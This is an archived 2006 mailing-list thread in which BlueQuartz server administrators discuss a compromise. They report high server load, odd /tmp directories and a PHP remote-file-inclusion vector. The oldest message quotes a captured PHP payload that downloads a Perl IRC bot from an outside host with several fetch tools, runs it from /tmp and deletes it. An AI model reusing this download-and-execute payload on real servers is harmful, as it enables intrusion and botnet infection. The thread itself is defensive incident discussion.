Index: [Article Count Order] [Thread]

Date:  Mon, 11 Sep 2006 19:30:52 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:06842] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <00cb01c6d5fa$52a73d30$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <4505E107.1060300 (at mark) planetcentral.net>
X-Mail-Count: 06842

I read somewhere on the 'net that .ICE-unix was ok.  .LiveZone is definitely
not.

My BQ machine made it up to server load 271!

> -----Original Message-----
> From: paul [mailto:paul (at mark) planetcentral.net]
> Sent: Monday, September 11, 2006 6:20 PM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:06838] Re: /TMP Directory
> 
> :o oh my god... have been trying for the last 2 days to work out what
> was up with my server, and thats it....
> 
> I seem to have the following in my /tmp folder :
> 
> 
> total 44
> drwxrwxrwt   5 root   root   4096 Sep 11 23:11 .
> drwxr-xr-x  25 root   root   4096 Sep 11 22:10 ..
> -rw-------   1 root   root     49 Sep 11 23:11 ClamAVBusy.lock
> drwxrwxrwt   2 root   root   4096 Sep 11 22:10 .ICE-unix
> drwxr-xr-x  10 apache apache 4096 Sep 11 22:09 .LiveZone
> drwxr-xr-x   9 apache apache 4096 Sep 11 23:06 matahati
> -rw-------   1 root   root   4697 Sep  9 21:35 .spamassassin4037sdcX9Htmp
> -r--r--r--   1 root   root    275 Sep 11 23:01 yum.check-update
> -rw-r--r--   1 root   root   1367 Sep 11 05:31 yum.update
> 
> Now the Clam i can understand. The yum and the spam assasin also. The
> rest shouldnt be there and need to be removed.
> 
> Please PLEASE could someone tell me how i can rid myself of this!
> 
> Now i know why i'm getting perl scripts hanging, using 98% Cpu time and
> the box load hits over 50 and things stop working!
> 
> Please help... It's only a home box with a couple of sites on it, but i
> want to get it back!!
> 
> Thanks
> Paul
> 
> 
> Paul Wilson - Swift Internet wrote:
> > It is also likely that your PHP script has a severe vulnerability in it
> >
> > I think the attack was in two parts - did you see the php script being
> > used in the following way (check your access_log)
> >
> > ****php?dir[inc]=http:// "URL location of attack script"
> >
> > This script would then be run to pull in the v6 script that you saw in
> > action.
> >
> >
> > The "php?dir[inc]" vulnerability became known at the tail end of
> > August, so these attacks are going to become more widespread.
> >
> > And yes, one of our servers was hit this way.
> >
> >
> > Regards
> >
> > Paul
> >
> >
> > ----- Original Message ----- From: "Darrell D. Mobley"
> > <dmobley (at mark) uhostme.net>
> > To: <coba-e (at mark) bluequartz.org>
> > Sent: Saturday, September 09, 2006 9:44 PM
> > Subject: [coba-e:06808] /TMP Directory
> >
> >
> >> There was some discussion here lately about the security fix that
> >> stopped
> >> programs from running in /TMP.  Is this configured by default if you
> >> have
> >> your BQ Yum updated?  I got a DDOS today where the users were trying
> >> to run
> >> the following program via PHP:
> >>
> >> <?
> >> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> >> v6.txt;rm -f v6*');
> >> passthru('cd /tmp;curl -O
> >> http://perqafohu.com/~armendibx/oki/v6.txt;perl
> >> v6.txt;rm -f v6*');
> >> passthru('cd /tmp;lwp-download
> >> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> >> passthru('cd /tmp;lynx -source
> >> http://perqafohu.com/~armendibx/oki/v6.txt
> >>> v6.txt;perl v6.txt;rm -f v6*');
> >> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
> >>> v6.txt;perl v6.txt;rm -f v6*');
> >> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
> >>> v6.txt;perl v6.txt;rm -f v6*');
> >> ?>
> >>
> >> The v6.txt is a Perl script that installs some IRC software and
> >> monitors IRC
> >> on open ports.  I do not think the script was successful in running,
> >> but I
> >> just want to make sure the /TMP security is enabled where files can't
> >> be run
> >> there.  While I don't think the DDOS attack was successful in running
> >> the
> >> script, it was successful in shutting down the serer due to MySQL
> >> becoming
> >> overwhelmed.  Server load was up to 156!
> >>
> >> Any suggestions would be appreciated.
> >>
> >>
> >
> >
> 
> 
> --
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.